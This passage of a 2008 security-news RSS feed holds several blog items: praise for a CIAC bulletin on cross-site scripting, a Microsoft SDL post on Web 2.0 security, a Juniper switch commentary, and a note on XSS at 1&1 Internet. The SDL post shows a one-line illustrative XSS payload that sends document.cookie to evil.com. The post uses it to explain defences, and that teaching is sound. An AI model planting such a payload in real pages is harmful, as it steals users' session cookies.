<a href="http://feeds.feedburner.com/~f/StillsecureAfterAllTheseYears?a=5wvvOI"><img src="http://feeds.feedburner.com/~f/StillsecureAfterAllTheseYears?i=5wvvOI" border="0"></img></a> <a href="http://feeds.feedburner.com/~f/StillsecureAfterAllTheseYears?a=gWpzQI"><img src="http://feeds.feedburner.com/~f/StillsecureAfterAllTheseYears?i=gWpzQI" border="0"></img></a> <a href="http://feeds.feedburner.com/~f/StillsecureAfterAllTheseYears?a=nBriSI"><img src="http://feeds.feedburner.com/~f/StillsecureAfterAllTheseYears?i=nBriSI" border="0"></img></a> <a href="http://feeds.feedburner.com/~f/StillsecureAfterAllTheseYears?a=mrfD0I"><img src="http://feeds.feedburner.com/~f/StillsecureAfterAllTheseYears?i=mrfD0I" border="0"></img></a> <a href="http://feeds.feedburner.com/~f/StillsecureAfterAllTheseYears?a=ZYOPti"><img src="http://feeds.feedburner.com/~f/StillsecureAfterAllTheseYears?i=ZYOPti" border="0"></img></a> <a href="http://feeds.feedburner.com/~f/StillsecureAfterAllTheseYears?a=qyWSTi"><img src="http://feeds.feedburner.com/~f/StillsecureAfterAllTheseYears?i=qyWSTi" border="0"></img></a>
</div><img src="http://feeds.feedburner.com/~r/StillsecureAfterAllTheseYears/~4/311620759" height="1" width="1"/>]]></content:encoded>
      <pubDate>Fri, 13 Jun 2008 20:26:46 +0000</pubDate>
      <category domain="http://securityratty.com/tag/bump">bump</category>
      <category domain="http://securityratty.com/tag/bump responds">bump responds</category>
      <category domain="http://securityratty.com/tag/sales people">sales people</category>
      <category domain="http://securityratty.com/tag/people">people</category>
      <category domain="http://securityratty.com/tag/bump doubts">bump doubts</category>
      <category domain="http://securityratty.com/tag/bump writes">bump writes</category>
      <category domain="http://securityratty.com/tag/security">security</category>
      <category domain="http://securityratty.com/tag/security vendors">security vendors</category>
      <category domain="http://securityratty.com/tag/person">person</category>
      <source url="http://feeds.feedburner.com/~r/StillsecureAfterAllTheseYears/~3/311620759/mr-bump-has-a-p.html">Mr Bump has a problem with me being frustrated by loving customers</source>
    </item>
    <item>
      <title><![CDATA[CIAC Tech Bulletin on XSS a valuable reference]]></title>
      <link>http://securityratty.com/article/14d768c1277ece67ce8d1db383a0b2a2</link>
      <guid>http://securityratty.com/article/14d768c1277ece67ce8d1db383a0b2a2</guid>
      <description><![CDATA[The only fault I could possibly find in the recently released CIAC Technical Bulletin, CIACTech08-003: Understanding Cross-Site Scripting (XSS) , is that it should have been released a year ago or...]]></description>
      <content:encoded><![CDATA[The only fault I could possibly find in the recently released <a href="http://www.ciac.org">CIAC</a> Technical Bulletin, <a href="http://www.ciac.org/ciac/techbull/CIACTech08-003.shtml">CIACTech08-003: Understanding Cross-Site Scripting (XSS)</a>, is that it should have been released a year ago or more. ;-)<br />But rather than nitpick, I'd like to applaud. <br />This is a fine effort, with a number of good resources cited.<br />You'll find content on the types of cross-site scripting, including DOM, non-persistent, persistent, and CSRF. Additionally, you'll note methods of protection and reference links to content on <a href="http://us.php.net/htmlspecialchars">Htmlspecialchars</a>, <a href="http://us3.php.net/htmlentities">Htmlentities</a>, and Giorgio Maone's <a href="http://noscript.net/">NoScript</a>. <br />This is a great starting point for enlightening vendors, developers, and IT folk who may not be as up to speed as you might like on the concerns caused by XSS vulnerabilities.<br />Given the fact that stories continue to surface on the shortcomings of major <a href="http://www.xssed.com/news/72/Verisign_McAfee_and_Symantec_sites_can_be_used_for_phishing_due_to_XSS/">security</a> <a href="http://www.darkreading.com/document.asp?doc_id=155995">vendors</a>, and their utter lack of diligence with regard to XSS, as well as efforts to further <a href="http://holisticinfosec.org/content/view/69/1/">enlighten</a> the masses, this is a valiant effort. <br />Well done, CIAC.<br /><br /><a href="http://del.icio.us/post?url=http://holisticinfosec.blogspot.com/2008/06/ciac-tech-bulletin-on-xss-valuable.html&title=CIAC%20Tech%20Bulletin%20on%20XSS%20a%20valuable%20reference " title="CIAC Tech Bulletin on XSS a valuable reference">del.icio.us</a> | <a href="http://digg.com/submit?phase=2&amp;url=http://holisticinfosec.blogspot.com/2008/06/ciac-tech-bulletin-on-xss-valuable.html" title="CIAC Tech Bulletin on XSS a valuable reference ">digg</a>]]></content:encoded>
      <pubDate>Tue, 10 Jun 2008 06:21:00 +0000</pubDate>
      <category domain="http://securityratty.com/tag/ciac">ciac</category>
      <category domain="http://securityratty.com/tag/xss">xss</category>
      <category domain="http://securityratty.com/tag/vendors">vendors</category>
      <category domain="http://securityratty.com/tag/xss vulnerabilities">xss vulnerabilities</category>
      <category domain="http://securityratty.com/tag/ciac technical bulletin">ciac technical bulletin</category>
      <category domain="http://securityratty.com/tag/major security vendors">major security vendors</category>
      <category domain="http://securityratty.com/tag/stories continue">stories continue</category>
      <category domain="http://securityratty.com/tag/content">content</category>
      <category domain="http://securityratty.com/tag/fine effort">fine effort</category>
      <source url="http://holisticinfosec.blogspot.com/2008/06/ciac-tech-bulletin-on-xss-valuable.html">CIAC Tech Bulletin on XSS a valuable reference</source>
    </item>
    <item>
      <title><![CDATA[SDL and Web 2.0]]></title>
      <link>http://securityratty.com/article/51d7b41dd699616b271e22ad2dc04c10</link>
      <guid>http://securityratty.com/article/51d7b41dd699616b271e22ad2dc04c10</guid>
      <description><![CDATA[Hi everyone, Bryan Sullivan here
Unless youve been living in an ice cave on the polar cap for the last month, youve heard about Microsofts proposed acquisition of Yahoo. George Hulme of...]]></description>
      <content:encoded><![CDATA[<P class=MsoNormal style="MARGIN: 0in 0in 10pt"><FONT face=Calibri size=3></FONT>&nbsp;</P>
<P class=MsoNormal style="MARGIN: 0in 0in 10pt"><FONT face=Calibri size=3>Hi everyone, Bryan Sullivan here.&nbsp;</FONT></P>
<P class=MsoNormal style="MARGIN: 0in 0in 10pt"><FONT face=Calibri size=3>Unless you’ve been living in an ice cave on the polar cap for the last month, you’ve heard about Microsoft’s proposed acquisition of Yahoo. George Hulme of InformationWeek wrote a very insightful </FONT><A href="http://www.informationweek.com/blog/main/archives/2008/02/web_20_security.html" mce_href="http://www.informationweek.com/blog/main/archives/2008/02/web_20_security.html"><FONT face=Calibri color=#0000ff size=3>column</FONT></A><FONT face=Calibri size=3> about the </FONT><A style="mso-comment-reference: BJS_1; mso-comment-date: 20080218T1703"><FONT face=Calibri size=3>proposed</FONT></A><FONT face=Calibri size=3> acquisition and what it would mean for Yahoo’s Web 2.0 properties. My favorite quote from this column (probably my favorite quote from anyone’s column so far this year): “…there’s still much to do in the [software] industry to reach a level of truly sustainable computing. This is perhaps especially true in the nascent area of Web 2.0 development. <B style="mso-bidi-font-weight: normal">Let’s hope Microsoft brings its Trustworthy Computing Initiative, or more precisely its Security Development Lifecycle to Yahoo</B>, should the $45 billion deal come through.” That’s pretty high praise for the SDL, but what exactly does the SDL have to say about Web 2.0 development? To answer this question, let’s take a look at a couple of security issues that affect Web 2.0 applications and then dive into the corresponding SDL requirements.</FONT></P>
<P class=MsoNormal style="MARGIN: 0in 0in 10pt"><FONT face=Calibri size=3>Many Web 2.0 applications allow their end users to build and contribute to the application. </FONT><FONT face=Calibri size=3>Think about social networking sites like </FONT><A href="http://www.facebook.com/" mce_href="http://www.facebook.com/"><FONT face=Calibri color=#0000ff size=3>Facebook</FONT></A><FONT face=Calibri size=3>, or wikis like </FONT><A href="http://en.wikipedia.org/" mce_href="http://en.wikipedia.org/"><FONT face=Calibri color=#0000ff size=3>Wikipedia</FONT></A><FONT face=Calibri size=3>. The content on sites like these comes directly from the users themselves. (Remember that you were Time Magazine’s Person of the Year in </FONT><A href="http://www.time.com/time/magazine/article/0,9171,1569514,00.html" mce_href="http://www.time.com/time/magazine/article/0,9171,1569514,00.html"><FONT face=Calibri color=#0000ff size=3>2006</FONT></A><FONT face=Calibri size=3> for this very reason!) While this is very empowering for users, it does beg the question: If users can add their own content to a web site, what’s to prevent them from adding malicious content? Consider what would happen if Evil Eve adds the following HTML to a wiki entry:</FONT></P>
<P class=MsoNormal style="MARGIN: 0in 0in 10pt"><FONT size=3><FONT face=Calibri><SPAN lang=DE style="mso-ansi-language: DE">&lt;img src=“http://www.evil.com/eve?“ </SPAN>+ document.cookie/&gt;</FONT></FONT></P>
<P class=MsoNormal style="MARGIN: 0in 0in 10pt"><FONT face=Calibri size=3>If the wiki accepts this content from Eve, then anyone who looks at the wiki entry will have their browser cookie “stolen” and sent to Eve at evil.com. The cookie could potentially contain login credentials or other sensitive information, allowing Eve to impersonate her victim and essentially commit a form of identity theft.</FONT></P>
<P class=MsoNormal style="MARGIN: 0in 0in 10pt"><FONT face=Calibri size=3>The attack I’ve shown here is known as a persistent Cross-Site Scripting (XSS) attack, and is the most dangerous form of XSS since it doesn’t require any social engineering like reflective and </FONT><A style="mso-comment-reference: BJS_3; mso-comment-date: 20080218T1706"></A><A href="http://en.wikipedia.org/wiki/Cross-site_scripting#DOM-based" mce_href="http://en.wikipedia.org/wiki/Cross-site_scripting#DOM-based"><SPAN style="mso-comment-continuation: 3"><FONT face=Calibri color=#0000ff size=3>DOM-based</FONT></SPAN></A><SPAN class=MsoCommentReference><SPAN style="FONT-SIZE: 8pt; LINE-HEIGHT: 115%"><SPAN style="mso-special-character: comment"><FONT face=Calibri>&nbsp;</FONT></SPAN></SPAN></SPAN><FONT face=Calibri size=3>XSS attacks do. The victim doesn’t have to do anything unusual – he just has to browse to an infected page, maybe even one he’s been to hundreds of times in the past. And in all likelihood, he’ll never even know he was a victim. The </FONT><A href="http://en.wikipedia.org/wiki/Samy_%28XSS%29" mce_href="http://en.wikipedia.org/wiki/Samy_%28XSS%29"><FONT face=Calibri color=#0000ff size=3>Samy worm</FONT></A><FONT face=Calibri size=3> which infected </FONT><A href="http://www.myspace.com/" mce_href="http://www.myspace.com/"><FONT face=Calibri color=#0000ff size=3>MySpace</FONT></A><FONT face=Calibri size=3> in late 2005 exploited a persistent XSS vulnerability to silently spread through its victims’ profile pages. Within less than a day after its release, Samy had spread to over one million MySpace users, forcing MySpace to completely shut down its site while they diagnosed and fixed the vulnerability.</FONT></P>
<P class=MsoNormal style="MARGIN: 0in 0in 10pt"><SPAN style="mso-spacerun: yes"><FONT face=Calibri size=3>&nbsp;</FONT></SPAN><A style="mso-comment-reference: BJS_4; mso-comment-date: 20080218T1701"><FONT face=Calibri size=3>(As a side note, I’d like to point out that if the developers of the hypothetical wiki in the earlier example had used the </FONT></A><A href="http://msdn2.microsoft.com/en-us/library/ms533046.aspx" mce_href="http://msdn2.microsoft.com/en-us/library/ms533046.aspx"><SPAN style="mso-comment-continuation: 4"><FONT face=Calibri color=#0000ff size=3>HttpOnly</FONT></SPAN></A><FONT face=Calibri><SPAN style="mso-comment-continuation: 4"><FONT size=3> attribute for their site cookies, Evil Eve would not have been able to steal those cookies. However, HttpOnly is just a defense-in-depth measure and not a complete solution for the inherent problem of end users being able to write malicious code into the web site.)</FONT></SPAN></FONT></P>
<P class=MsoNormal style="MARGIN: 0in 0in 10pt"><FONT face=Calibri size=3>Web mashups are another popular component of Web 2.0. JavaScript’s </FONT><A href="http://en.wikipedia.org/wiki/Same_origin_policy" mce_href="http://en.wikipedia.org/wiki/Same_origin_policy"><FONT face=Calibri color=#0000ff size=3>Same Origin Policy</FONT></A><FONT face=Calibri size=3> prevents web developers from writing client-based mashups (that is, mashups that don’t use a server proxy to request data from the individual sites being “mashed” together) in straight DHTML. Some Rich Internet Application (RIA) frameworks, notably Adobe’s </FONT><A href="http://www.adobe.com/products/flash/" mce_href="http://www.adobe.com/products/flash/"><FONT face=Calibri color=#0000ff size=3>Flash</FONT></A><FONT face=Calibri size=3> and Microsoft’s </FONT><A href="http://www.silverlight.net/" mce_href="http://www.silverlight.net/"><FONT face=Calibri color=#0000ff size=3>Silverlight</FONT></A><FONT face=Calibri size=3>, offer mechanisms to bypass the Same Origin Policy. For Flash, this mechanism is an XML file (crossdomain.xml) hosted on the domain root that lists all the external domains that should be granted access to the Flash movie. For example, if you host a Flash movie at www.mysite.com, and want to allow access from www.friendlysite.com, you would create a file www.mysite.com/crossdomain.xml with content as follows:</FONT></P>
<P class=MsoNoSpacing style="MARGIN: 0in 0in 0pt"><FONT face=Calibri size=3>&lt;cross-domain-policy&gt;</FONT></P>
<P class=MsoNoSpacing style="MARGIN: 0in 0in 0pt"><FONT size=3><FONT face=Calibri><SPAN style="mso-spacerun: yes">&nbsp; </SPAN><SPAN style="mso-spacerun: yes">&nbsp;</SPAN>&lt;allow-access-from domain=”www.friendlysite.com”/&gt;</FONT></FONT></P>
<P class=MsoNoSpacing style="MARGIN: 0in 0in 0pt"><FONT face=Calibri size=3>&lt;/cross-domain-policy&gt;</FONT></P>
<P class=MsoNoSpacing style="MARGIN: 0in 0in 0pt"><?xml:namespace prefix = o ns = "urn:schemas-microsoft-com:office:office" /><o:p><FONT face=Calibri size=3>&nbsp;</FONT></o:p></P>
<P class=MsoNormal style="MARGIN: 0in 0in 10pt"><FONT face=Calibri size=3>So far, so good. However, crossdomain.xml allows not just specific domain names in the allow-access-from element (ie “www.friendlysite.com”) but also wildcards (“*.friendlysite.com”). In fact, it will even allow wildcards that break the </FONT><A href="http://www.cookiecentral.com/faq/#3.3" mce_href="http://www.cookiecentral.com/faq/#3.3"><FONT face=Calibri color=#0000ff size=3>two-dots</FONT></A><FONT face=Calibri size=3> rule like “*.com” or even just “*”. By using </FONT><A style="mso-comment-reference: BJS_5; mso-comment-date: 20080218T1707"><FONT face=Calibri size=3>highly</FONT></A><FONT face=Calibri size=3> permissive access lists like this, a developer is essentially letting anyone on the internet manipulate his objects and data. In an attack very reminiscent of the Samy worm, Chris Shiflett </FONT><A href="http://shiflett.org/blog/2006/sep/the-dangers-of-cross-domain-ajax-with-flash" mce_href="http://shiflett.org/blog/2006/sep/the-dangers-of-cross-domain-ajax-with-flash"><FONT face=Calibri color=#0000ff size=3>exploited</FONT></A><FONT face=Calibri size=3> an allow-access-from-* entry in </FONT><A href="http://www.flickr.com/" mce_href="http://www.flickr.com/"><FONT face=Calibri color=#0000ff size=3>Flickr</FONT></A><FONT face=Calibri size=3>’s crossdomain.xml file that caused any visitor to Chris’s web site to automatically add Chris to their Flickr friends list. While this may not be the scariest attack you’ve ever heard of, imagine what might happen if a truly malicious user discovers the same vulnerability in the fund</FONT><A style="mso-comment-reference: BJS_6; mso-comment-date: 20080218T1710"><FONT face=Calibri size=3> transfer functionality of a bank’s web site, or the security trading functionality of a brokerage firm’s&nbsp;</FONT></A><FONT face=Calibri size=3>web site.</FONT></P>
<P class=MsoNormal style="MARGIN: 0in 0in 10pt"><FONT face=Calibri size=3>So, what does the SDL have to say about these issues? In terms of XSS prevention, the SDL offers a lot of guidance. The SDL requires the use of both input validation (making sure that user input conforms to a known good format – in the case of the wiki entry, to deny HTML and script content) and output encoding (making sure that any active content that gets past the input validation routines is rendered as harmless text and not executed). Internally, we also mandate the use of </FONT><A style="mso-comment-reference: BJS_7; mso-comment-date: 20080218T1716"></A><A href="http://blogs.msdn.com/ace_team/archive/2007/10/22/xssdetect-public-beta-now-available.aspx" mce_href="http://blogs.msdn.com/ace_team/archive/2007/10/22/xssdetect-public-beta-now-available.aspx"><SPAN style="mso-comment-continuation: 7"><FONT face=Calibri color=#0000ff size=3>code analysis tools</FONT></SPAN></A><SPAN class=MsoCommentReference><SPAN style="FONT-SIZE: 8pt; LINE-HEIGHT: 115%"><SPAN style="mso-special-character: comment"><FONT face=Calibri>&nbsp;</FONT></SPAN></SPAN></SPAN><FONT face=Calibri size=3>to find XSS vulnerabilities that might otherwise slip through the cracks. This is great advice for anyone developing web applications, whether they’re Web 2.0 or 1.0.</FONT></P>
<P class=MsoNormal style="MARGIN: 0in 0in 10pt"><FONT face=Calibri size=3>As for cross-domain policy files, the SDL provides several recommendations. First is a simple attack surface reduction: if a site is not meant to be accessed by foreign domains, then any cross-domain policy files should be removed from the site. Second, if an application offers cross-domain access and also has functionality available only to authenticated users, then this site must not contain overly permissive access lists like “*” or “*.com”. It’s best to list specific domains wherever possible, or at least follow the same two-dots rule that HTTP cookies have to follow for their domain specifications. This helps to limit the sites that can perform request forgery attacks like the Flickr attack mentioned earlier. If no applications anywhere on the site offer special functionality for authenticated users, then the SDL does permit the site to have a broad-reaching cross-domain access list. However, this does require constant oversight to ensure that no authenticated applications are added to the site at a later time. In my opinion, it’s safer just to lock down the list to exactly the sites that are necessary and no more.</FONT></P>
<P class=MsoNormal style="MARGIN: 0in 0in 10pt"><FONT face=Calibri size=3>Regardless of what happens between Microsoft and Yahoo, I agree with George that adoption of the SDL would benefit Yahoo’s Web 2.0 applications. In fact, I’ll take it a step further and state that adoption of the SDL would benefit anyone’s Web 2.0 applications. In my next SDL blog post, I’ll be addressing the trickiest aspect of implementing the SDL for Web 2.0: developing the “perpetual beta”.</FONT></P><img src="http://blogs.msdn.com/aggbug.aspx?PostID=7937889" width="1" height="1">]]></content:encoded>
      <pubDate>Thu, 28 Feb 2008 19:26:00 +0000</pubDate>
      <category domain="http://securityratty.com/tag/web">web</category>
      <category domain="http://securityratty.com/tag/site">site</category>
      <category domain="http://securityratty.com/tag/chriss web site">chriss web site</category>
      <category domain="http://securityratty.com/tag/mashups">mashups</category>
      <category domain="http://securityratty.com/tag/web mashups">web mashups</category>
      <category domain="http://securityratty.com/tag/site cookies">site cookies</category>
      <category domain="http://securityratty.com/tag/persistent cross-site">persistent cross-site</category>
      <category domain="http://securityratty.com/tag/cookies">cookies</category>
      <category domain="http://securityratty.com/tag/benefit anyones web">benefit anyones web</category>
      <source url="http://blogs.msdn.com/sdl/archive/2008/02/28/sdl-and-web-2-0.aspx">SDL and Web 2.0</source>
    </item>
    <item>
      <title><![CDATA[Juniper switches - Where's the beef?]]></title>
      <link>http://securityratty.com/article/a2c1e085c69b4ebda7304948ebb52a09</link>
      <guid>http://securityratty.com/article/a2c1e085c69b4ebda7304948ebb52a09</guid>
      <description><![CDATA[With Junipers long awaited release of their EX switch line, many have said that there is just nothing distinguishing about the line up. Just speeds and feeds. Others are saying that the real secret...]]></description>
      <content:encoded><![CDATA[
<div xmlns="http://www.w3.org/1999/xhtml"><p>With Junipers long awaited release of their EX switch line, many have said that there is just nothing distinguishing about the line up.&nbsp; Just speeds and feeds.&nbsp; Others are saying that the real secret sauce is the JUNOS.&nbsp; That very well may be.&nbsp; However, Tim Greene in this <a href="http://www.networkworld.com/news/2008/013108-nac-juniper-weapon.html">article</a> says that Junipers built in NAC may be Junipers not-so-secret weapon. He quotes two analysts, Phil Hochmuth of Yankee Group and Rob Whiteley of Forrest-er.&nbsp; The article rightfully points out that Junipers competition in the switch market is Cisco and HP ProCurve.&nbsp; <br /><br />It then goes on from there to talk about Junipers new ability to perform access control at layer 4 with identity based access control with ACLs in addition to VLANs. You can perform QoS as part of a users access rights and they can mirror traffic and send it to a Juniper IDP for post-admission NAC. Juniper wants to evolve NetScreen Security Manager into a central policy-control platform.&nbsp; This is all great stuff, however it ain't new.&nbsp; My research shows that HP ProCurve (the 2nd leading switch vendor) actually does much if not all of this right now. Using the ProCurve IDM (identity driven management) application which is now bundled on ProCurve's NAC appliance&nbsp; with their NAC application, they can do this already. They can do the QoS thing as well as sending the traffic to several IPS brands.&nbsp; In fact a close reading of what ProCurve's security capabilities show that there is little if anything ground breaking in what Juniper is advocating and what these analysts seem to be eating up. <br /><br />Yes, Junipers entry I think does spell C-O-M-P-E-T-I-T-I-O-N for the likes of Nevis and ConSentry (sorry Dan and Dom), but that is not what Juniper is in this game for.&nbsp; They have to keep their eye on the prize. And the prize is taking market share from Cisco and HP ProCurve.&nbsp; If this is all they got, I am going to have to agree with those folks who are asking Juniper &quot;where's the beef?&quot;</p><embed src="http://www.youtube.com/v/Ug75diEyiA0&amp;rel=0&amp;color1=0x006699&amp;color2=0x54abd6&amp;border=0" width="425" height="355" type="application/x-shockwave-flash" wmode="transparent"></embed></div>

<p><a href="http://feeds.feedburner.com/~a/StillsecureAfterAllTheseYears?a=aWjAZg"><img src="http://feeds.feedburner.com/~a/StillsecureAfterAllTheseYears?i=aWjAZg" border="0"></img></a></p><div class="feedflare">
<a href="http://feeds.feedburner.com/~f/StillsecureAfterAllTheseYears?a=vhTLXPE"><img src="http://feeds.feedburner.com/~f/StillsecureAfterAllTheseYears?i=vhTLXPE" border="0"></img></a> <a href="http://feeds.feedburner.com/~f/StillsecureAfterAllTheseYears?a=ouy8D4E"><img src="http://feeds.feedburner.com/~f/StillsecureAfterAllTheseYears?i=ouy8D4E" border="0"></img></a> <a href="http://feeds.feedburner.com/~f/StillsecureAfterAllTheseYears?a=N8RGSSE"><img src="http://feeds.feedburner.com/~f/StillsecureAfterAllTheseYears?i=N8RGSSE" border="0"></img></a> <a href="http://feeds.feedburner.com/~f/StillsecureAfterAllTheseYears?a=RNXgjHE"><img src="http://feeds.feedburner.com/~f/StillsecureAfterAllTheseYears?i=RNXgjHE" border="0"></img></a> <a href="http://feeds.feedburner.com/~f/StillsecureAfterAllTheseYears?a=oMdsRHe"><img src="http://feeds.feedburner.com/~f/StillsecureAfterAllTheseYears?i=oMdsRHe" border="0"></img></a> <a href="http://feeds.feedburner.com/~f/StillsecureAfterAllTheseYears?a=RIEzWk"><img src="http://feeds.feedburner.com/~f/StillsecureAfterAllTheseYears?i=RIEzWk" border="0"></img></a>
</div><img src="http://feeds.feedburner.com/~r/StillsecureAfterAllTheseYears/~4/227243744" height="1" width="1"/>]]></content:encoded>
      <pubDate>Fri, 01 Feb 2008 04:34:50 +0000</pubDate>
      <category domain="http://securityratty.com/tag/juniper">juniper</category>
      <category domain="http://securityratty.com/tag/junipers competition">junipers competition</category>
      <category domain="http://securityratty.com/tag/junipers">junipers</category>
      <category domain="http://securityratty.com/tag/junipers not-so-secret weapon">junipers not-so-secret weapon</category>
      <category domain="http://securityratty.com/tag/application">application</category>
      <category domain="http://securityratty.com/tag/nac application">nac application</category>
      <category domain="http://securityratty.com/tag/procurve">procurve</category>
      <category domain="http://securityratty.com/tag/nac">nac</category>
      <category domain="http://securityratty.com/tag/procurve idm">procurve idm</category>
      <source url="http://feeds.feedburner.com/~r/StillsecureAfterAllTheseYears/~3/227243744/juniper-switche.html">Juniper switches - Where's the beef?</source>
    </item>
    <item>
      <title><![CDATA[1&1 Internet Customers Vulnerable to XSS]]></title>
      <link>http://securityratty.com/article/41f3a3d4a6e95b135927a0f785935acc</link>
      <guid>http://securityratty.com/article/41f3a3d4a6e95b135927a0f785935acc</guid>
      <description><![CDATA[John Smith sent me this this link to a writeup on customers who are hosted at 1&amp;1 Internet are vulnerable to XSS . The technique is simple, but it comes from the way in which they present ads based on...]]></description>
      <content:encoded><![CDATA[<p>John Smith sent me this <A HREF="http://www.xssnews.com/2007/12/27/a-large-number-of-sites-hosted-by-11-internet-inc-are-vulnerable-to-xss/">this link to a writeup on customers who are hosted at 1&#038;1 Internet are vulnerable to XSS</A>.  The technique is simple, but it comes from the way in which they present ads based on detection of a file not found.  They pop up an iframe based on file name which you can jump out of pretty easily.  Not so good.  I&#8217;m not sure what sort of customers 1&#038;1 Internet provides service for but I&#8217;d be unhappy if I were a customer there.  Apparently this only applies to Sedo parking prior to a certain date, and also doesn&#8217;t apply to users who use custom 404 pages (which I generally prefer to do, personally).</p>
<p>This brings up an interesting point though about the use of third party advertising and how that can be used to do wide scale XSS exploitation.  In this case it&#8217;s no different, except instead of it being a Dom based XSS like it would normally have to be, the server does a reflection for you.  Odd problem.  I&#8217;ve ran into similar problems with hosting providers that put log files for all their customers in the same predictable location.  So finding their customers is the only hard part.  Getting their logs is easy!  Nice find!</p>
<!--Sun, 30 December 2007 15:12:59 +000-->]]></content:encoded>
      <pubDate>Sun, 30 Dec 2007 18:15:23 +0000</pubDate>
      <category domain="http://securityratty.com/tag/customers">customers</category>
      <category domain="http://securityratty.com/tag/xss">xss</category>
      <category domain="http://securityratty.com/tag/internet">internet</category>
      <category domain="http://securityratty.com/tag/dom based xss">dom based xss</category>
      <category domain="http://securityratty.com/tag/file">file</category>
      <category domain="http://securityratty.com/tag/john smith">john smith</category>
      <category domain="http://securityratty.com/tag/predictable location">predictable location</category>
      <category domain="http://securityratty.com/tag/pretty easily">pretty easily</category>
      <category domain="http://securityratty.com/tag/ads based">ads based</category>
      <source url="http://ha.ckers.org/blog/20071230/11-internet-customers-vulnerable-to-xss/">1&amp;1 Internet Customers Vulnerable to XSS</source>
    </item>
  </channel>
</rss>
